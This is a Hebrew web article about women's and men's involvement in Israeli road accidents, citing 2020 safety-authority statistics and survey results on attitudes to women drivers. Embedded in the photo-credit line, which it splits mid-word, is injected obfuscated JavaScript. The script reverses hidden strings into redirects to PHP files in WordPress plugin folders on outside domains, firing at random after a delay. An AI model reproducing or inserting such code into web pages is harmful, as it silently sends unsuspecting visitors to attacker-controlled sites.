fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

סעו ברכה: על נהיגת נשים, גברים ותאונות דרכים

על תאונות דרכים בתקופת הקורונה דובר לא מעט אך מה בנוגע למעורבותן של נשים בהן בפרט? ומי מבין שני המינים נוהג זהיר ובטוח יותר? בכתבה הבאה
צילום: Shutterstock
צילום: Shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מאת: זאב נחמנזון 

"מי לימד אותך לנהוג", "מי נתן לך רישיון" או "מי חונה ככה" – למרות שמשפטים אלו נכתבו בלשון הפונה גם לגברים וגם לנשים, סביר להניח שבאופן כמעט אינטואיטיבי קראתם אותם כאילו נכתבו לנשים בלבד. תפיסה זו אינה נכונה להיום שכן נהגות בישראל, בדומה למתרחש בעולם כולו, מעורבות פחות בתאונות דרכים מאשר גברים. הפער ניכר, הסיבות ברורות והעניין גם מגובה בשלל נתונים, מחקרים ועובדות. כך למשל, במעמד רכישת ביטוח מקיף שמטרתו בין היתר לחסוך מכם כאבי ראש וכיס במקרים של תאונות דרכים ונזקים לרכב, תופתעו לגלות שנשים עשויות לקבל הצעה טובה יותר מגברים. כשביטוח הרכב מתבסס גם על ניהול סיכונים, אין זה פלא שהכסף מדבר ובשעה שזה של נשים שקול יותר – אין צורך בהוכחה גדולה מזו. ומה בנוגע לשיעור מעורבותן של נשים בתאונות דרכים? על כך נדון בשורות הבאות.    

קצת נתונים

לפי נתוני הרשות הלאומית לבטיחות בדרכים בשנת 2020 כולה, ב-28% מתאונות הדרכים בישראל היו מעורבות נשים. לולא היה מדובר בנושא כה רגיש דוגמת תאונות דרכים היינו רושמים "רק 28%" אך השימוש במילה זו אינו מכבד את הנתונים העצובים. ככל שמדובר בתאונות קטלניות, מתוך 461 נהגים ונהגות רק 60 מתוכם הן נהגות, כ-13% מהסך המקרים. בתאונות קשות, אחוז הנהגות המעורבות עומד על כ-15 – עדיין פער עצום ביחס לנהגים. כמו כן, למען הסדר הטוב, מתוך כלל בעלי רישיון הנהיגה על רכב פרטי בישראל כ-45% הן נשים, כלומר אין מדובר בנתון סטטיסטי שישנן פחות נשים על הכביש ועדיין, הפער לא קטן.

סכנות והסללות

כשזה נוגע לניהול הסיכונים של חברות הביטוח מתברר כי גם כאן נשים עושות זאת טוב יותר מגברים בצורה שקולה ומבוססת. זה בא לידי ביטוי גם בענייני היומיום, העבודה והמשפחה וגם – בנהיגה בטוחה בהרבה. הסיכוי שאישה תצא לעקיפה מסוכנת או לא תקפיד על שמירת מרחק, נמוך משמעותית מזה שגבר יעשה זאת. יתכן ורבים יתפסו זאת כ"פחדנות" ויתכן גם שיכעסו על נהיגתה האיטית מהמצופה אך בשורה התחתונה, כך גם יורדים סיכוייה למעורבות בתאונה. סטטיסטית זה נחמד, בפועל מדובר בחיים ומוות, תחליטו אתם מה מעצבן יותר. 

בצד מודל החשיבה והגישה הנשית לכביש, גברים "אמיצים" יותר, נוסעים במהירות מופרזת ומבצעים בלימות מסוכנות. מעבר לכך שהסבירות לתאונת דרכים עולה במאות אחוזים, זה מעצבן ומרתיע נשים אך לא מונע בעדן לסמוך יותר על הנהג. באופן כמעט אבסורדי וכנראה מתוך דעה קדומה המלווה אותנו מאות ואלפי שנים – גברים תמיד ייתפסו כאחראיים ומיומנים יותר, גם על-ידי נשים. 

במחקר שערכה זה מכבר הרשות הלאומית לבטיחות בדרכים עולה כי 55% מהנשאלים חשים בטוחים במידה שווה לצד נהגים ונהגות כאחד, 38% ירגישו בטוח יותר לצד גבר נוהג ורק 7% ירגישו בטוח יותר לצד נהגת. 41% מהנשאלים בטוחים שגברים נהגים טובים יותר, 17% טוענים שדווקא נשים ואילו השאר אינם רואים הבדל. מתוך כלל הנסקרים, מחצית היו גברים ומחצית נשים, מה שמעיד על כך שלדיעות קדומות אין מגדר.

לרווחת הציבור

אחת מהמסקנות המתבקשות והמזמינות ביותר בהמשך לנתונים אלו היא שילובם של נשים בתחבורה הציבורית בישראל, שמלכתחילה אינה נתפסת כחיובית במיוחד. חברות האוטובוס – הסובלות מבעיה מתמדת של מחסור בנהגים, ישמחו להציע משרות לנהגות, מה שצפוי לקדם את מעמד הנשים בחברה הישראלית כמו גם לצמצם את פערי השכר ולהקדים את שוק התעסוקה בארץ. גם בקרב נהגי המוניות, שלפני בערך 40 שנה הפגינו והקימו צעקה גדולה אל מול משרדי הממשלה במטרה למנוע כניסת נשים לענף, החלו להפנים שהרווח הוא של כולנו ושהגיע הזמן, בדיוק כמו בחברות הביטוח, לחשוב מה יותר נכון עבור כולם ולהתקדם.

לסיכום, בניגוד לקלישאות ולסטיגמות הרווחות, נשים הן נהגות זהירות ושקולות יותר בכביש שכן המספרים מדברים בעד עצמם. תנו להן את המקום הראוי להן – הן בכביש והן מחוצה לו וחשוב יותר, השתדלו להיות נהגים טובים וסבלניים יותר.  

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות